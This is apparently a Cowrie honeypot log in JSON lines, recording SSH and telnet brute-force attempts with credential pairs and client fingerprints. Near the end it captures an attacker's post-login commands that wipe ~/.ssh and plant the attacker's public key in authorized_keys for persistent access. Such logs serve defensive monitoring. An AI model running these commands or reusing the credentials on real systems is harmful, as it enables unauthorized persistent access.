{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:56.062330Z","src_ip":"212.227.235.229","session":"f93ac3a41b4d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:56.432460Z","src_ip":"212.227.235.229","session":"f93ac3a41b4d"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:56.484149Z","src_ip":"212.227.125.160","session":"7191c6b6ab9a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:57.517754Z","src_ip":"212.227.235.229","session":"f93ac3a41b4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44340,"dst_ip":"1.2.3.4","dst_port":22,"session":"28136aa07654","protocol":"ssh","message":"New connection: 212.227.235.229:44340 (1.2.3.4:22) [session: 28136aa07654]","sensor":"my-vps","timestamp":"2025-08-31T05:30:57.599346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:57.600316Z","src_ip":"212.227.235.229","session":"28136aa07654"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:57.681738Z","src_ip":"212.227.235.229","session":"28136aa07654"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:30:58.048435Z","src_ip":"212.227.235.229","session":"28136aa07654"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:58.131845Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:58.132717Z","src_ip":"212.227.235.229","session":"28136aa07654"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:30:59.158253Z","src_ip":"212.227.235.229","session":"c018819ade1c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:30:59.159122Z","src_ip":"212.227.235.229","session":"c018819ade1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55772,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff8d78e9efd4","protocol":"ssh","message":"New connection: 212.227.235.229:55772 (1.2.3.4:22) [session: ff8d78e9efd4]","sensor":"my-vps","timestamp":"2025-08-31T05:31:01.214950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:31:01.983055Z","src_ip":"212.227.235.229","session":"ff8d78e9efd4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:31:01.983884Z","src_ip":"212.227.235.229","session":"ff8d78e9efd4"}
{"eventid":"cowrie.session.closed","duration":"30.2","message":"Connection lost after 30.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:02.751685Z","src_ip":"212.227.125.160","session":"7191c6b6ab9a"}
{"eventid":"cowrie.login.failed","username":"test1","password":"12345","message":"login attempt [test1/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:31:08.092476Z","src_ip":"212.227.235.229","session":"ff8d78e9efd4"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:09.956140Z","src_ip":"212.227.235.229","session":"ff8d78e9efd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52518,"dst_ip":"1.2.3.4","dst_port":22,"session":"0901f77b84c5","protocol":"ssh","message":"New connection: 212.227.235.229:52518 (1.2.3.4:22) [session: 0901f77b84c5]","sensor":"my-vps","timestamp":"2025-08-31T05:31:12.681821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:12.684389Z","src_ip":"212.227.235.229","session":"0901f77b84c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:12.939627Z","src_ip":"212.227.235.229","session":"0901f77b84c5"}
{"eventid":"cowrie.login.failed","username":"server","password":"server1","message":"login attempt [server/server1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:31:13.949769Z","src_ip":"212.227.235.229","session":"0901f77b84c5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:15.208662Z","src_ip":"212.227.235.229","session":"0901f77b84c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57598,"dst_ip":"1.2.3.4","dst_port":22,"session":"10e9176844c0","protocol":"ssh","message":"New connection: 212.227.125.160:57598 (1.2.3.4:22) [session: 10e9176844c0]","sensor":"my-vps","timestamp":"2025-08-31T05:31:16.094405Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59540,"dst_ip":"1.2.3.4","dst_port":23,"session":"22f0901fe7dc","protocol":"telnet","message":"New connection: 212.227.235.229:59540 (1.2.3.4:23) [session: 22f0901fe7dc]","sensor":"my-vps","timestamp":"2025-08-31T05:31:17.071002Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":35532,"dst_ip":"1.2.3.4","dst_port":22,"session":"23cb8581d338","protocol":"ssh","message":"New connection: 170.64.166.123:35532 (1.2.3.4:22) [session: 23cb8581d338]","sensor":"my-vps","timestamp":"2025-08-31T05:31:19.750381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:19.751356Z","src_ip":"170.64.166.123","session":"23cb8581d338"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:20.031391Z","src_ip":"170.64.166.123","session":"23cb8581d338"}
{"eventid":"cowrie.login.failed","username":"redis","password":"1qaz#EDC","message":"login attempt [redis/1qaz#EDC] failed","sensor":"my-vps","timestamp":"2025-08-31T05:31:21.194646Z","src_ip":"170.64.166.123","session":"23cb8581d338"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:22.475990Z","src_ip":"170.64.166.123","session":"23cb8581d338"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45824,"dst_ip":"1.2.3.4","dst_port":22,"session":"afc108656f87","protocol":"ssh","message":"New connection: 212.227.125.160:45824 (1.2.3.4:22) [session: afc108656f87]","sensor":"my-vps","timestamp":"2025-08-31T05:31:22.797330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:31:23.280005Z","src_ip":"212.227.125.160","session":"afc108656f87"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:31:23.280687Z","src_ip":"212.227.125.160","session":"afc108656f87"}
{"eventid":"cowrie.login.failed","username":"test1","password":"12345","message":"login attempt [test1/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:31:25.691236Z","src_ip":"212.227.125.160","session":"afc108656f87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35488,"dst_ip":"1.2.3.4","dst_port":22,"session":"942608ddfe48","protocol":"ssh","message":"New connection: 212.227.235.229:35488 (1.2.3.4:22) [session: 942608ddfe48]","sensor":"my-vps","timestamp":"2025-08-31T05:31:27.000190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:27.001358Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:27.274439Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:27.348341Z","src_ip":"212.227.125.160","session":"afc108656f87"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@2023","message":"login attempt [root/Root@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:31:28.401664Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:31:28.965268Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:31:28.965979Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:31:28.966916Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:29.240643Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:31:29.849901Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:31:29.850738Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:31:30.124943Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:30.125988Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36826,"dst_ip":"1.2.3.4","dst_port":22,"session":"64a6329cc9f9","protocol":"ssh","message":"New connection: 212.227.235.229:36826 (1.2.3.4:22) [session: 64a6329cc9f9]","sensor":"my-vps","timestamp":"2025-08-31T05:31:30.399113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:30.400128Z","src_ip":"212.227.235.229","session":"64a6329cc9f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:30.674453Z","src_ip":"212.227.235.229","session":"64a6329cc9f9"}
